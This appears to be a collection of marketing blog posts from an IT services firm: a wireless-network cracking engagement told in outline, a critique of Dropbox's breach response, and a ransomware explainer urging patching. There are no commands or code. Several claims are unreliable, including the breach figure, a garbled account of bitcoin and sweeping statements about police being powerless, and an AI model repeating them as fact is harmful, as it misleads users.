White Hat Hacking: Doing Wrong to Do Right

Over a month ago, Triton Technologies was given a challenge.

The challenge was simple: break our wireless network and you have our security contract. Sounds great in theory, but in reality white hat hacking is a quite complex method and time-consuming.

Security Penetration: Break Their Wireless Network

We had been trying to acquire this company for years and we knew their shortcomings, insecurity and data protection management. So we set out to do what we’ve been asked to do, break their wireless network.

So in order to protect something, you need to know what weapons your enemy is going to use. If you don’t know, you can’t protect against it and the battle is lost.

Here’s What We Did

Step 1. We acquired multiple Raspberry Pi 3 minicomputers with dedicated external wireless antennas. We installed Kali Linux and Aircrack-ng and linked them all through a cellular VPN to our Amazon cluster.

Step 2. Over a period of days, we captured thousands of packets that were transmitted by or their wireless access points. Utilizing known methods of breach and capture, we captured gigabytes of usable data.

Step 3. Utilizing our Amazon cluster of dedicated CPUs, we uploaded our packet capture data and began to crunch the code to retrieve the wireless information.

Step 4. And we waited. And waited.

Mission Accomplished

We came in over a long holiday weekend and found that the cracking utility found the password. So we drove out to the client, them unaware and we locked into their wireless network gaining access to their entire infrastructure.

A few days later we had a meeting with the client, presented our findings, and they have changed to us their managed IT services.

The Need for White Hat Hacking

What we did was known as white hat hacking, utilizing known methods of security penetration in a controlled environment to prevent any kind of serious breach in the future. This is extremely encouraged by our clients in order to test their defenses and test the reliability and dependability of their hardware and services.

Only Strong As The Weakest Security

Over a period of a few days, we discovered a lazy password methodology, unpatched systems, and that the firmware for the wireless access points was never upgraded beyond their defaults, all making their defeat easier than expected. It also reinforces the fact of having complex and long passwords within systems. You cannot control such as wireless access points or cellular devices. We cannot harp enough that complexity will help in security.

We replaced their wireless access points with ubiquity and are now monitoring their entire infrastructure on a minute by minute basis. Contact us to learn the weakness in your current system and what we can do to help.

Data Breaches and Dropbox

Dropbox over 4 years ago had a data breach which exposed over 86 million users to hackers. The hackers could have access to the passwords for the accounts, encrypted and unencrypted. We look at data breaches and Dropbox, namely their failure on handling it.

It was 4 years ago. They are just making available the data now. That is a massive breach of trust. 4 years of your personal data exposed to the world and you not knowing about it. Only in August 2016 did Dropbox make users aware of the data breach, but what was even worse is how they handled it.

How They Handled the Data Breach

In most data breach situations, they make the users aware almost immediately upon learning about it, force users to change their passwords and almost always there is another layer of security added to prevent it from happening again.

This time around, no such luck.

At best, Dropbox advised users to change their passwords, but did not require it. This is terribly bad. Not only did they delay in the discovery of the breach, their remedy does nothing to prevent a back door from being implemented and all the data stolen before you’re even aware.

Triton’s Recommendation: Change Your File Sharer

Many businesses and personal users rely on file sharing services like Dropbox to transfer files and be able to access them on the go. The copy or deletion of these files in a data breach can not only be a setback, but can also become a real liability for companies transferring client data.

You have to be able to trust the service you use.

That is why Triton Technologies can no longer recommend Dropbox for your individual file sharing and mobile needs.

We recommend a product called Share Sync. Share Sync has proven to us how safe, secure and compliant it is with industry standards and laws.  If you do use Dropbox, uninstall it and switch away. Contact us to learn more about our recommendation, and other secure services available through managed IT providers.

Dispelling Ransomware Myths

Ransomware is the new underground economy.

In the last few years, a new breed of exploit has arrived on the scene, called Ransomware. Basically, what it does is encrypts all your files, demands bitcoins or some other crypto currency and waits. It usually has a timer giving you a couple of days to setup an account, transfer the funds and when done they usually send you the decryption codes.

Why Does This Happen: Money, Greed, and a Lack of Patching

A majority of infections are from “drive-by” downloads. You go to a website, or to an obscure search engine and a virus writer has purchased an AD on that page or engine. In the coding, it displays to the search engine something different than what others see to avoid detection. When you go to that page, it runs a JavaScript with usually a zero-day exploit and tries to inject itself in your computer, and you don’t have to do anything for it to come in. It tests the weaknesses of your java, shockwave, HTML interpreter or other system weakness and exploits it.

What is a “Crypto Currency”?

Years ago (and there is some disagreement how it was developed), a new type of currency was developed. It was named “BitCoin”. Bitcoins are computer generated slices of encrypted code that utilizes each other to generate a code when it considered a currency. You can slice and dice up this code to pay other people, bundle up all the bitcoins or be able to send money to anyone else on the planet. It is extremely fast, easy to use and no one government controls it. It also has some drawbacks: enter in the wrong bitcoins address and it is gone, never to come back.

My Files are Encrypted. What do I do?

Most people don’t think anything of the popup that they receive when the initial demand for payment is made until they go to launch a program or access a file. That is when people begin to panic. Word, Excel, PDF’s and more are locked down solid. They want their bitcoins and your data is being held hostage to deliver them. The virus is smart, so it disabled system restore and in some cases deleted backups in the process.

I’ll Call the Police, They’ll Help!

Nope. The people who develop these ransomware viruses are overseas and they use the highest encryption they can get their hands on. Usually, 4096 bit+ RSA multi-key crypto keys and they are extremely hard to break if you’re not a major super power. FBI, NSA, DHS and the local police have no tools to help you. These writers specifically target small business owners, hospitals, and smaller targets so the governments do not get involved. If they targeted larger, then something would be done. The best thing is just to NOT get infected to begin with by utilizing a terrific antivirus, patching, and maintenance program and being proactive in your security.

Patching Your Computer

If you see a leak in a dam, you patch it right? Why not your computer?

Many people avoid patches, and yes, there are many. From Windows updates to Office updates, Adobe Reader, Shockwave, Firefox, Google Chrome and more it requires you to keep on top of them. Why? Anyone of them can be a vector to enter into your computer and you should be patched. At Triton Technologies, we have an excellent patching system in place for our clients and networks. We update once a day for workstations, weekly for servers, and hourly for 3rd party software such as Adobe, Google and more. It pretty much KILLS the ransomware even before it has a chance to come in.

I Have a Firewall, I Don’t Need to Patch All the Time!

Nope, the firewall is just another line of defense, but it shouldn’t be your only defense. You need to have a proper maintenance program in place, security protocols in place, anti-virus that is up to date and more. Just relying on a single piece of technology for a total system defense is not only bad for data security, it could potentially bankrupt your business. If you’ve got any of these concerns, or are recovering from a ransomware attack: contact us. We can help you get your system back up and backed up, and make sure it never happens again.